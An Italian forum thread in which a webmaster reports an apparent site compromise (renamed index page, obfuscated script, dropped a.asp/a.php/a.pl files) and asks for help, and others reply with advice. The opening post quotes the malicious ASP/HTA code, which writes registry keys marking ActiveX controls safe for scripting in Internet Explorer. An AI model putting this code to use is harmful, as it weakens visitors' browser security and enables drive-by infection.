attcco sito

[tes]

Ora Attacco 15:15
Account Tes

Quest'oggi loggandoci al sito abbiamo notato che c'erano alcuni files che credo facciano parte di un attacco.
In particolare, due file chiamati a.asp ed a.php con uno script (lo stesso nei due diversi linguaggi).
La pagina index.php era stata rinominata in _index.php ed al suo posto ho trovato una pagina con un codice javascript ( :\ o meglio una serie lunghissima di lettere senza senso... credo sia un codice criptato).

Vorrei precisare che sullo spazio non è presente nessuno script php/asp che possa essere stato "bucato" e non ho DB (c'è soltanto un piccolo sondaggio che funziona tramite file di testo) e la pass l'abbiamo solo io ed una amica che è assolutamente fidata.

Ora ho ripristinato la mia vecchia home e il sito mi funziona, ma la mia collaboratrice dice che il sito le restituisce pagina bianca se accede solo con l'url http://www.nomesito.altervista.org e che l'unico modo x vederlo è digitare il nome completo con la pagina http://www.nome.altervista.org/index.php
Potrebbe essere questo il risultato dell'attacco?

Codice della pagina Asp:
__________________________________________________
<%Response.Addheader "Content-Type", "application/hta"
Response.Write "<script language=vbs>self.MoveTo 0, 0
Set r=CreateObject(\"WScript.Shell\")
r.RegWrite \"HKCR\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}\\Implemented Categories\\{7DD95801-9882-11CF-9FA9-00AA006C42C4}\\\",\"\",\"REG_SZ\"
r.RegWrite \"HKCR\\CLSID\\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\\Implemented Categories\\{7DD95801-9882-11CF-9FA9-00AA006C42C4}\\\",\"\",\"REG_SZ\"
self.Close
</script>"%>
__________________________________________________
Abbiamo anche trovato dentro l'ftp questi file: a.pl, a.asp, a.php con dentro codice java criptato.

>< Accetto consigli/aiuti da chiunque!

[SolitaryExplorer]

Il tuo sito è perfettamente raggiungibile senza alcun problema.

Per quanto riguarda lo "script", leggendo su alcuni siti un po' poco tranquilli, sembra essere un sistema di attacco che ha effetto solo con Microsoft Internet Explorer.
In realtà non capisco bene a cosa serva quel pezzo codice, però è chiaro che crea alcune chiavi nel registro di sistema di Windows.
Magari ci sono anche altre parti di codice che non hai pubblicato (ed è meglio così) che servono a dare altre istruzioni.
Una comunità cracker spagnola afferma che utilizzando un sistema simile a quello che hai descritto, sia possibile accedere ad uno spazio web senza autorizzazione.

Ovviamente non metto la mano sul fuoco per dire se ciò sia possibile con quel metodo, ad ogni modo questo è quello che ti so dire.

[tes]

>< Aiuto!
Il sito ha subito altri 2 attacchi identici al primo nell'arco del pomeriggio!

Abbiamo cambiato password e perfino la mail di riferimento per il recupero password ma nulla sembra funzionare!

[funcool]

Ma hai qualche script per far caricare file?

[tes]

no tutto quello che abbiamo è il contatore visite ed un sondaggino

[SolitaryExplorer]

Che contatore di visite e sondaggi usi?

[tes]

Che contatore di visite e sondaggi usi?

Contatore: http://www.0stats.com
Il sondaggino è una cosa che sta completamente in locale scaricata dal sito html.it Oo se non sbaglio è stato fatto da quelli del sito http://www.tkohnen.com

Cmq. ora che ho installato un altro firewall mi da un errore virus quando apro la paginad delle statistiche del sito :\ xò non so se è xè effettiamente può essere questo servizio o se è solo il firewall che esagera un po' :\

e cmq. ho il contatore da + di un mese e non mi ha mai dato problemi, e poi non vedo cosa ci guadagnerebbe il mio contatore a bloccarmi il sito

[SolitaryExplorer]

Scaricati Avast Home Edition oppure AVG free antivirus e dopo averli aggiornati fai una bella scansione antivirus sul tuo pc.
Scaricati AD-aware e SpyBot search & destroy e dopo aver aggiornato anche loro fai una bella scansione al tuo pc.
Ovviamente le operazioni di scansione vanno fatte mentre sei disconnesso da internet.

Mi sa tanto che il problema sta nel tuo computer.